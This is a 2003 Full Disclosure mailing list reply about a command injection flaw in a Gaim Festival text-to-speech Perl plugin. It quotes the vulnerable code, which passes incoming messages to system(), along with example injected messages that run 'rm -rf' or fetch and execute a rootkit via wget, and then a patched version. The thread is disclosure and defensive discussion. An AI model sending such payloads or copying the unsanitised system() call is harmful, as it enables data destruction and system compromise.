Full Disclosure mailing list archives
Re: Gaim festival plugin exploit
From: HCTITS Security Division <security () humancentrictech com>
Date: 17 Oct 2003 21:05:07 -0400
DUH... would help if I attached my attachment. I am right proud of myself for this, and it also needs mention to address the security issue that our friend Error (is that a reference to Zelda 2?) raised. Attached, find the latest reissue of the Gaim festival plugin. The guy that wrote it, wrote it for pre-0.68 Perl API, but it was secure against the sort of attack that Error described. I have since taken it and recoded it to work with post-0.68 versions of Gaim. It is attached. By all means, if you see an exploitable bug in there, let me know! I'm just a perl-tot.. Cheers, ~Brian On Wed, 2003-10-15 at 11:29, error wrote:
It has come to my attention that people have actually used this example code for a gaim plugin: AIM::register("Festival TTS", "0.0.1", "goodbye", ""); AIM::print("Perl Says", "Loaded Festival TTS"); AIM::command("idle", "60000") if ($pro ne "Offline"); AIM::add_event_handler("event_im_recv", "synthesize"); sub goodbye { AIM::print("Module Unloaded", "Unloaded Festival TTS"); } sub synthesize { my $string = $_[0]; $string =~ s/\<.*?\>//g; $string =~ s/\".*\"//; system("echo \"$string\" | /usr/bin/festival --tts"); } As taken from: http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl This has to be one of the most amusing ways to gain a local users privileges I have ever seen by an "Expert (TM)" Exploit code? You have a shell through gaim with that. Just pass it this message (or really any message for that matter): Hey, I just wanted to exploit your box, do you mind?"; rm -rf; Or perhaps: Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x rootkit;./rootkit Perhaps someone should ask: "(Is s/[^\w]//g really that hard to do?!)" So a fixed version would look like this: AIM::register("Festival TTS", "0.0.1", "goodbye", ""); AIM::print("Perl Says", "Loaded Festival TTS"); AIM::command("idle", "60000") if ($pro ne "Offline"); AIM::add_event_handler("event_im_recv", "synthesize"); sub goodbye { AIM::print("Module Unloaded", "Unloaded Festival TTS"); } sub synthesize { my $string = $_[0]; $string =~ s/\<.*?\>//g; $string =~ s/\".*\"//; $string =~ s/[^\w]//g; system("echo \"$string\" | /usr/bin/festival --tts"); } Just a minor comment, nothing special.
-- HCTITS Security Division <security () humancentrictech com> HumanCentric Technologies
Attachment:
gabfest.pl
Description:
Current thread:
- Gaim festival plugin exploit error (Oct 15)
- Re: Gaim festival plugin exploit Randal L. Schwartz (Oct 15)
- Re: Gaim festival plugin exploit Jérôme Augé (Oct 16)
- Re: Gaim festival plugin exploit HCTITS Security Division (Oct 17)
- Re: Re: Gaim festival plugin exploit Randal L. Schwartz (Oct 17)
- Re: Re: Gaim festival plugin exploit Valdis . Kletnieks (Oct 18)
- Re: Re: Gaim festival plugin exploit Randal L. Schwartz (Oct 17)
- Re: Gaim festival plugin exploit HCTITS Security Division (Oct 17)
- Re: Re: Gaim festival plugin exploit Cael Abal (Oct 17)
- Re: [Cert-lists] Re: Re: Gaim festival plugin exploit Georg Moritz (Oct 20)
- Re: Gaim festival plugin exploit Randal L. Schwartz (Oct 20)
- Re: Re: Gaim festival plugin exploit Brian Hatch (Oct 23)
- Re: Re: Gaim festival plugin exploit Randal L. Schwartz (Oct 23)
- RE: Re: Gaim festival plugin exploit Scott Phelps / Dreamwright Studios (Oct 23)
- Re: Re: Gaim festival plugin exploit Dale Harris (Oct 23)
- Re: Re: Gaim festival plugin exploit Shawn McMahon (Oct 23)
- Re: Re: Gaim festival plugin exploit Randal L. Schwartz (Oct 23)
- Re: Re: Gaim festival plugin exploit Randal L. Schwartz (Oct 23)
- Re: Re: Gaim festival plugin exploit Cael Abal (Oct 17)